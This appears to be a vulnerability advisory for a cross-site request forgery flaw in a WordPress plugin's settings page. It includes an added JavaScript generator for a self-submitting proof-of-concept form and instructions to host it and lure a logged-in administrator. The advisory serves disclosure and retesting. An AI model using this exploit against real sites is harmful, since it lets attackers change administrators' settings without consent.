The plugin has no CSRF check in place when updating its settings, so an attacker who lures a logged-in administrator onto a page they control can change those settings on the administrator's behalf. In WordPress that check is normally a nonce emitted with wp_nonce_field() in the settings form and verified with check_admin_referer() (alongside a capability check) before anything is saved.
Use the following form to abuse the CSRF vulnerability on the settings page. It POSTs the parameters below to the settings handler:

| Parameter | Value |
|---|---|
| action | |
| layout | |
| textColor | |
| contentBackgroundColor | |
| starColor | |
| visibilitySubTitle | |
| visibilityAvatar | |
| visibilitySubTitleTwo | |
| visibilityRating | |
| defaultBgImg | |
| textAlignment | |
| logoUrl | |
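A generator for the self-submitting proof-of-concept page described above, added here as an example and not part of the advisory. It takes the parameter names from the table; the settings endpoint (`admin-post.php`), the value of `action` and every setting value it fills in are assumptions, since the page gives only the names. Values are attribute-escaped so that a `logoUrl` containing quotes or angle brackets cannot break the generated form.

```javascript
// Added example, not from the advisory: build a self-submitting CSRF
// proof-of-concept page for the settings form described above.
// The endpoint, the "action" value and all setting values are ASSUMPTIONS;
// the advisory lists only the parameter names.

// Parameter names exactly as listed on the page.
const SETTINGS_PARAMS = [
  'action', 'layout', 'textColor', 'contentBackgroundColor', 'starColor',
  'visibilitySubTitle', 'visibilitySubTitleTwo', 'visibilityAvatar',
  'visibilityRating', 'defaultBgImg', 'textAlignment', 'logoUrl',
];

// Escape a value for a double-quoted HTML attribute so an attacker-chosen
// setting (e.g. a logoUrl with quotes) cannot break out of its hidden input.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build the PoC HTML: a POST form aimed at the settings handler with one
// hidden input per parameter, submitted by script as soon as the page loads
// in the logged-in admin's browser. Parameters not given are sent empty,
// which an unchecked handler will save as-is.
function buildCsrfPoc(targetUrl, values) {
  const inputs = SETTINGS_PARAMS.map((name) => {
    const v = Object.prototype.hasOwnProperty.call(values, name) ? values[name] : '';
    return `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(v)}">`;
  });
  return [
    '<html><body>',
    `  <form id="csrf" method="POST" action="${escapeAttr(targetUrl)}">`,
    ...inputs,
    '  </form>',
    '  <script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Count hidden inputs in generated HTML, to confirm the PoC covers every
// parameter before it is handed to a tester.
function countHiddenInputs(html) {
  return (html.match(/<input type="hidden"/g) || []).length;
}

// Hypothetical target and values (assumed; the page does not give them).
const POC_HTML = buildCsrfPoc(
  'https://victim.example/wp-admin/admin-post.php',
  {
    action: 'save_plugin_settings',
    layout: 'grid',
    textColor: '#000000',
    logoUrl: 'https://attacker.example/logo.png',
  },
);

if (typeof require !== 'undefined' && require.main === module) {
  console.log(POC_HTML);
}
```

Save the printed HTML on an attacker-controlled host and have the logged-in administrator open it; the form submits without any user interaction. The same generator serves retesting after a fix: once the handler verifies a nonce, the request should be rejected.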